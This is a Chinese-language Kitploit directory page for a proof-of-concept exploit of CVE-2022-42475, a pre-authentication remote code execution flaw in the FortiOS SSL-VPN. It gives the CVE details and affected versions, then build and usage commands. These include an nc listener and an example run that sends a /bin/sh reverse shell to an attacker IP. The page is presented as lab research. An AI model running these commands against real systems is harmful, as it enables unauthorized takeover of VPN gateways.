Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2022-42475-poc — 用于研究和受控实验室验证 CVE-2022-42475 的概念验证(PoC),这是一个影响特定版本 FortiOS 中 SSL-VPN 服务的严重基于堆的缓冲区溢出漏洞。 | Kitploit
工具/GitHubGitHub/ull0a/cve-2022-42475-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队远程访问工具
GitHubull0a/cve-2022-42475-poc

cve-2022-42475-poc

用于研究和受控实验室验证 CVE-2022-42475 的概念验证(PoC),这是一个影响特定版本 FortiOS 中 SSL-VPN 服务的严重基于堆的缓冲区溢出漏洞。

查看仓库
16小时29分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-42475 PoC

Fortinet SSL VPN 预认证远程代码执行

描述

CVE-2022-42475 是 FortiOS SSL VPN 服务中的一个基于堆的缓冲区溢出漏洞,允许未认证的攻击者通过向 /remote/error 端点发送特制的 HTTP 请求来远程执行任意代码(RCE)。

该漏洞在官方补丁发布之前已被在野积极利用(0-day)。

PoC 执行

以下截图展示了在授权实验室环境中执行 PoC 的画面:

输出展示了 PoC 的执行过程以及与用于测试的 FortiOS 实例的交互。

PoC 执行

CVE 信息

字段值
CVE IDCVE-2022-42475
CVSS 3.19.3(严重)
向量CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-122
发现时间2022 年 12 月
官方补丁FortiOS 7.2.3, 7.0.9, 6.4.11, 6.2.12, 6.0.16

受影响版本

  • FortiOS 7.2.0–7.2.2
  • FortiOS 7.0.0–7.0.8
  • FortiOS 6.4.0–6.4.10
  • FortiOS 6.2.0–6.2.11
  • FortiOS 6.0.0–6.0.15
  • FortiOS 5.6.0–5.6.14
  • FortiOS 5.4.0–5.4.13
  • FortiOS 5.2.0–5.2.15
  • FortiOS 5.0.0–5.0.14

要求

  • Go 1.18+(用于编译 PoC)
  • 可通过网络访问目标主机的 443 端口(或配置的 SSL VPN 端口)
  • 授权实验室环境用于执行测试

编译

root@kitploit:~
# Clonar o descargar el código fuente
git clone https://github.com/uLl0a/cve-2022-42475-poc
cd cve-2022-42475-poc

# Compilar
go build -o exploit exploit.go

# O ejecutar directamente
go run exploit.go <target> <port> <reverse_ip> <params>

用法

root@kitploit:~
./exploit <target_host> <target_port> <reverse_ip> <param1> [param2...]

示例

root@kitploit:~
# En el atacante, iniciar listener
nc -lvnp 80

# Ejecutar el exploit
./exploit 192.168.1.100 443 10.0.0.5 /bin/sh -i
下载工具